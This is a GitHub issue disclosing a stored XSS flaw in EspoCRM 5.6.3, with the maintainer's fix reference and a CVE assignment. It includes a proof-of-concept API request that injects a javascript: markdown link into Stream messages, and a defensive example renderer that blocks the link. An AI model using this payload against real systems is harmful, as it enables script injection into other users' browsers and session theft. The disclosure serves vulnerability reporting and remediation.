
Stored XSS in Stream messages #1349

Closed
KhajiitStoleNothing opened this issue Jul 12, 2019 · 2 comments

KhajiitStoleNothing commented Jul 12, 2019

Description

The current version of EspoCRM, 5.6.3, is vulnerable to stored XSS due to a lack of filtering of user-supplied data in Stream messages. A malicious attacker can create a specially crafted link that contains JavaScript code and assign it to any user in the system. After the link is clicked, the malicious JavaScript code will be executed in the user's browser.

PoC

Make the following request (insert your authentication data and hostname):

```http
POST /api/v1/Note HTTP/1.1
Host: <PASTE YOUR HOSTNAME HERE>
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Basic <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization: <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 108
Cookie: <PASTE YOUR COOKIE HERE>

{"type":"Post","targetType":"self","post":"[test](javascript:alert(document.domain%29)","attachmentsIds":[]}
```

Then open the notifications and click the link.
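The root cause above is a markdown link destination that reaches the `href` attribute with its scheme unchecked. The following is an added example, not EspoCRM's code or the fix in 97bdd22: a renderer that allowlists link schemes and falls back to plain text for anything else, run against the same payload shape as the PoC. `ALLOWED_SCHEMES`, `safeLinkHref` and `renderLinks` are names chosen for this example.

```javascript
// Schemes a Stream message link may carry; everything else is dropped.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Returns the href to emit, or null when the destination must not become a link.
function safeLinkHref(rawHref) {
  let href = rawHref;
  try {
    // The browser percent-decodes a javascript: URL before running it,
    // so the scheme check has to run on the decoded form too.
    href = decodeURIComponent(href);
  } catch (e) {
    return null; // malformed %-sequence: refuse rather than guess
  }
  // Strip ASCII control characters and whitespace that browsers ignore
  // inside a scheme (e.g. "java\tscript:").
  href = href.replace(/[\u0000-\u0020\u007f]/g, "");
  const schemeMatch = /^([a-z][a-z0-9+.-]*:)/i.exec(href);
  if (!schemeMatch) {
    return rawHref; // relative URL: no scheme to abuse
  }
  return ALLOWED_SCHEMES.has(schemeMatch[1].toLowerCase()) ? rawHref : null;
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Renders [text](dest) links: text is HTML-escaped, and a destination with a
// disallowed scheme is emitted as plain text instead of an <a> element.
function renderLinks(markdown) {
  return markdown.replace(/\[([^\]]*)\]\(([^\s)]*)\)/g, (m, text, dest) => {
    const label = escapeHtml(text);
    const href = safeLinkHref(dest);
    if (href === null) return label;
    return `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${label}</a>`;
  });
}

// Constructed input mirroring the PoC payload: renders as the bare word "test".
const poc = "[test](javascript:alert(document.domain%29)";
console.log(renderLinks(poc));
```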

@yurikuzn (Contributor)

Thanks for reporting. Fix: 97bdd22

yurikuzn added this to the Version 5.6.4 milestone Jul 15, 2019
yurikuzn self-assigned this Jul 15, 2019
yurikuzn added the bug label Jul 15, 2019
yurikuzn changed the title from "Stored XSS in Stream messages" to "EspoCRM 5.6.3 Stored XSS in Stream messages" Jul 15, 2019

fgeek commented Aug 7, 2019

This has been assigned https://nvd.nist.gov/vuln/detail/CVE-2019-13643
